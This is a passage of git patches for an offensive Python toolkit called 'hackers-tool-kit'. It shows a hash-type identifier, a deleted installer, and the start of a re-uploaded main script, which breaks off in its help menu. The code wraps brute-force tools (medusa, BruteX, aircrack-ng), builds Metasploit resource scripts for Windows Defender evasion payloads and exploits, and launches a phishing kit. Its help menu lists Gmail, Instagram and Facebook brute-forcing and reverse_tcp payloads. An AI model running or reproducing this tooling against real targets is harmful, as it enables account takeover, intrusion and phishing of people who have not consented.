SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -def upgrade(): - os.system("apt update && apt upgrade") -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -def about(): - print "\033[92m------------------------------------------------------------" - print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" - print "------------------------------------------------------------" - print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" - print "------------------------------------------------------------" - print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" - print "------------------------------------------------------------" - print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" - print "------------------------------------------------------------\033[0m" -def terminal(): - os.system("gnome-terminal") -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "about": - about() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - found = True -mainbanner() -main() From 504f13709f648aea5c543ae2558388122108f943 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 1 Apr 2019 21:53:23 +0100 Subject: [PATCH 079/214] Delete install.py --- install.py | 105 ----------------------------------------------------- 1 file changed, 105 deletions(-) delete mode 100644 install.py diff --git a/install.py b/install.py deleted file mode 100644 index d1f82ad..0000000 --- a/install.py +++ /dev/null @@ -1,105 +0,0 @@ -import sys -import os - -def install(): - os.system("apt install sslstrip") - os.system("apt install bettercap") - os.system("apt install sslscan") - os.system("apt install crunch") - os.system("apt install tcpdump") - os.system("apt install macchanger") - os.system("apt install wafw00f") - os.system("apt install medusa") - os.system("cd /root && git clone https://github.com/thelinuxchoice/shellphish") - os.system("cd /root && git clone https://github.com/1N3/BruteX") - os.system("cd /root/BruteX && ./install.sh") - os.system("apt update") - os.system("pip install mechanize json whois python-whois requests bs4 requests[socks] urlparse cookielib") - os.system("pip install scapy datetime argparse re threading urllib2 modules builtwith smtplib") - os.system("pip install whois") - os.system("pip install builtwith") - os.system("pip install colorama") - os.system("pip install dnspython") - os.system("pip install shodan") - os.system("apt install python-socks -y") - os.system("apt install nmap -y") - os.system("apt install php -y") - os.system("apt install perl -y") - os.system("apt install hashcat -y") - os.system("apt install nc") - os.system("apt install neofetch") - os.system("apt install cupp") - os.system("gem install lolcat") - os.system("cd /root/ && git clone https://github.com/Und3rf10w/kali-anonsurf") - os.system("cd /root/kali-anonsurf && ./installer.sh") - print "\n" - print """entering big download region prepare you anus - if your not ready press ctrl C """ - i = raw_input("press ctrl c to stop hit enter to continue") - os.system("apt install metasploit-framework -y") - os.system("cd && git clone https://github.com/trustedsec/social-engineer-toolkit") - os.system("apt install wifite -y") - os.system("apt install reaver -y") - os.system("apt install aircrack-ng -y") - os.system("cd /root/social-engineer-toolkit && pip install -r requirements.txt") - os.system("python /root/social-engineer-toolkit/setup.py install") - - - -print "are you running on the real kali linux os [y/n]" -check = raw_input("[y/n]> ") -if check == "y" : - print "ok most tools should work for you you might have to install other" - print "things on your os for this to work if it doesnt work" - os.system("sleep 2") - install() - -if check == "n" : - print "then some of the tools in this script might not work" - print "do you want to continue installation [y/n]" - install = raw_input("[y/n]> ") - if install == "y" : - def install(): - os.system("apt install sslstrip") - os.system("apt install bettercap") - os.system("apt install sslscan") - os.system("apt install crunch") - os.system("apt install tcpdump") - os.system("apt install macchanger") - os.system("apt install wafw00f") - os.system("apt install medusa") - os.system("cd /root && git clone https://github.com/thelinuxchoice/shellphish") - os.system("cd /root && git clone https://github.com/1N3/BruteX") - os.system("cd /root/BruteX && ./install.sh") - os.system("apt update") - os.system("pip install mechanize json whois python-whois requests bs4 requests[socks] urlparse cookielib") - os.system("pip install scapy datetime argparse re threading urllib2 modules builtwith smtplib") - os.system("pip install whois") - os.system("pip install builtwith") - os.system("apt install python-socks -y") - os.system("apt install nmap -y") - os.system("apt install php -y") - os.system("apt install perl -y") - os.system("apt install hashcat") - os.system("apt install nc") - os.system("apt install neofetch") - os.system("apt install cupp") - os.system("gem install lolcat") - os.system("cd /root/ && git clone https://github.com/Und3rf10w/kali-anonsurf") - os.system("cd /root/kali-anonsurf && ./installer.sh") - print "\n" - print """entering big download region prepare you anus - if your not ready press ctrl C """ - i = raw_input("press ctrl c to stop hit enter to continue") - os.system("apt install metasploit-framework -y") - os.system("cd && git clone https://github.com/trustedsec/social-engineer-toolkit") - os.system("apt install wifite -y") - os.system("apt install reaver -y") - os.system("apt install aircrack-ng -y") - os.system("cd /root/social-engineer-toolkit && pip install -r requirements.txt") - os.system("python /root/social-engineer-toolkit/setup.py install") - - install() - if install == "n" : - print "thanks for checking out my script" - sys.exit() From 330ddc28743970cc48a0102d1b85c11d9fb0c343 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 1 Apr 2019 16:53:41 -0400 Subject: [PATCH 080/214] Add files via upload --- htk.py | 2063 ++++++++++++++++++++++++++++++++++++++++++++++++++++ install.py | 107 +++ 2 files changed, 2170 insertions(+) create mode 100644 htk.py create mode 100644 install.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..de6d1da --- /dev/null +++ b/htk.py @@ -0,0 +1,2063 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +def mainbanner(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +about : about the creator / me +? : displays this message +clear : clears screen except for banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra 